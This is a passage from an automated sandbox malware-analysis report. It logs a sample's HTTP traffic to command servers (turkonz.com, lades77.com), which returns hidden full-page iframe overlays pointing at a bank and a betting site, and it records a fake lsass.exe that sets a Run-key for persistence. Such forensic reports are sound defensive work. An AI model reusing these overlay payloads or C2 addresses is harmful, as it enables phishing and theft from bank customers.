6365 3238 3022 0d0a 4163 6365 7074 2d52    ce280"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
310d 0a43 6f6e 7465 6e74 2d54 7970 653a    1..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6265 7473 736f 6e30 392e 636f 6d2f 696e    betsson09.com/in
6465 782e 6173 7022 200d 0a77 6964 7468    dex.asp" ..width
3d31 3030 250d 0a68 6569 6768 743d 3130    =100%..height=10
3025 2020 6d61 7267 696e 6865 6967 6874    0%  marginheight
3d22 3022 206d 6172 6769 6e77 6964 7468    ="0" marginwidth
3d22 3022 2020 7363 726f 6c6c 696e 673d    ="0"  scrolling=
226e 6f22 200d 0a62 6f72 6465 723d 2230    "no" ..border="0
2220 0d0a 6672 616d 6562 6f72 6465 723d    " ..frameborder=
2230 2220 0d0a 746f 703d 2230 2220 6c65    "0" ..top="0" le
6674 3d22 3022 3e0d 0a59 6f75 7220 6272    ft="0">..Your br
6f77 7365 7220 646f 6573 206e 6f74 2073    owser does not s
7570 706f 7274 2069 6e6c 696e 6520 6672    upport inline fr
616d 6573 206f 7220 6973 2063 7572 7265    ames or is curre
6e74 6c79 2063 6f6e 6669 6775 7265 6420    ntly configured 
0d0a 6e6f 7420 746f 2064 6973 706c 6179    ..not to display
2069 6e6c 696e 6520 6672 616d 6573 2e0d     inline frames..
0a3c 2f49 4652 414d 453e 3c2f 6469 763e

from ANUBIS:1064 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6575    GET /img/jpg/yeu
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a30 3020 474d 540d 0a41 6363    4:23:00 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3565 3431 3562    s..ETag: "5e415b
3436 3132 3764 6339 313a 6164 3966 6322    46127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a35 3520 474d 540d    09 11:01:55 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7965 7572 2e74 7874              /js/yeur.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6575    GET /img/jpg/yeu
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a30 3020 474d 540d 0a41 6363    4:23:00 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3565 3431 3562    s..ETag: "5e415b
3436 3132 3764 6339 313a 6164 3966 6322    46127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a35 3520 474d 540d    09 11:01:55 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7965 7572 2e74 7874              /js/yeur.txt

from ANUBIS:1065 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 742

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6575 722e 7478 7420 4854 5450 2f31 2e31    eur.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3537    ar 2009 11:01:57
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 333a 3530    an 2009 04:13:50
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 642d 3139 372d 3436 3131 6539 6462    04d-197-4611e9db
6137 6238 3022 0d0a 4163 6365 7074 2d52    a7b80"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
370d 0a43 6f6e 7465 6e74 2d54 7970 653a    7..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7465 6b66 656e 6261 6e6b 2e63 6f6d 2e74    tekfenbank.com.t
722f 6465 6661 756c 742e 6874 6d22 200d    r/default.htm" .
0a77 6964 7468 3d31 3030 250d 0a68 6569    .width=100%..hei
6768 743d 3130 3025 2020 6d61 7267 696e    ght=100%  margin
6865 6967 6874 3d22 3022 206d 6172 6769    height="0" margi
6e77 6964 7468 3d22 3022 2020 7363 726f    nwidth="0"  scro
6c6c 696e 673d 226e 6f22 200d 0a62 6f72    lling="no" ..bor
6465 723d 2230 2220 0d0a 6672 616d 6562    der="0" ..frameb
6f72 6465 723d 2230 2220 0d0a 746f 703d    order="0" ..top=
2230 2220 6c65 6674 3d22 3022 3e0d 0a59    "0" left="0">..Y
6f75 7220 6272 6f77 7365 7220 646f 6573    our browser does
206e 6f74 2073 7570 706f 7274 2069 6e6c     not support inl
696e 6520 6672 616d 6573 206f 7220 6973    ine frames or is
2063 7572 7265 6e74 6c79 2063 6f6e 6669     currently confi
6775 7265 6420 0d0a 6e6f 7420 746f 2064    gured ..not to d
6973 706c 6179 2069 6e6c 696e 6520 6672    isplay inline fr
616d 6573 2e0d 0a3c 2f49 4652 414d 453e    ames...</IFRAME>
3c2f 6469 763e                             </div>

from ANUBIS:1066 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6669    GET /img/jpg/yfi
6e2e 7478 7420 4854 5450 2f31 2e31 0d0a    n.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a31 3720 474d 540d 0a41 6363    4:23:17 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6361 6130 3965    s..ETag: "caa09e
3530 3132 3764 6339 313a 6164 3966 6322    50127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a35 3820 474d 540d    09 11:01:58 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7966 696e 2e74 7874              /js/yfin.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6669    GET /img/jpg/yfi
6e2e 7478 7420 4854 5450 2f31 2e31 0d0a    n.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a31 3720 474d 540d 0a41 6363    4:23:17 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6361 6130 3965    s..ETag: "caa09e
3530 3132 3764 6339 313a 6164 3966 6322    50127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a35 3920 474d 540d    09 11:01:59 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7966 696e 2e74 7874              /js/yfin.txt

	- TCP Connection Attempts:

from ANUBIS:1046 to 78.111.96.8:80

from ANUBIS:1064 to 78.111.96.8:80

from ANUBIS:1037 to 66.147.242.99:80

from ANUBIS:1051 to 66.147.242.99:80

from ANUBIS:1059 to 66.147.242.99:80

from ANUBIS:1047 to 66.147.242.99:80

from ANUBIS:1048 to 78.111.96.8:80

from ANUBIS:1061 to 66.147.242.99:80

from ANUBIS:1056 to 78.111.96.8:80

from ANUBIS:1053 to 66.147.242.99:80

from ANUBIS:1055 to 66.147.242.99:80

from ANUBIS:1049 to 66.147.242.99:80

from ANUBIS:1042 to 78.111.96.8:80

from ANUBIS:1066 to 78.111.96.8:80

from ANUBIS:1065 to 66.147.242.99:80

from ANUBIS:1044 to 78.111.96.8:80

from ANUBIS:1038 to 78.111.96.8:80

from ANUBIS:1060 to 78.111.96.8:80

from ANUBIS:1054 to 78.111.96.8:80

from ANUBIS:1040 to 78.111.96.8:80

from ANUBIS:1041 to 66.147.242.99:80

from ANUBIS:1062 to 78.111.96.8:80

from ANUBIS:1052 to 78.111.96.8:80

from ANUBIS:1058 to 78.111.96.8:80

from ANUBIS:1045 to 66.147.242.99:80

from ANUBIS:1043 to 66.147.242.99:80

from ANUBIS:1036 to 78.111.96.8:80

from ANUBIS:1063 to 66.147.242.99:80

from ANUBIS:1034 to 78.111.96.8:80

from ANUBIS:1050 to 78.111.96.8:80

from ANUBIS:1057 to 66.147.242.99:80

from ANUBIS:1039 to 66.147.242.99:80

3. lsass.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	lsass.exe
MD5:	435bf8e48d1470254558e6e9355ed130
SHA-1:	4fba02e34af8f3c8ecb95f0ad861d0ea7041a3de
File Size:	90112 Bytes
Command Line:	C:\WINDOWS\srchasst\lsass.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\user32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\advapi32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\oleaut32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000

3.a) lsass.exe - Registry Activities

	- Registry Keys Created:

HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	System Starter	C:\WINDOWS\srchasst\lsass.exe

4. services.exe

	- General information about this executable

Analysis Reason:	NtConnectPort(\RPC Control\ntsvcs was called.
Filename:	services.exe
MD5:	0e776ed5f7cc9f94299e70461b7b8185
SHA-1:	cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf
File Size:	108544 Bytes
Command Line:	C:\WINDOWS\system32\services.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll

Analysis Report for 6e49d9550a4b1f30940373162457b888

Summary:

Table of Contents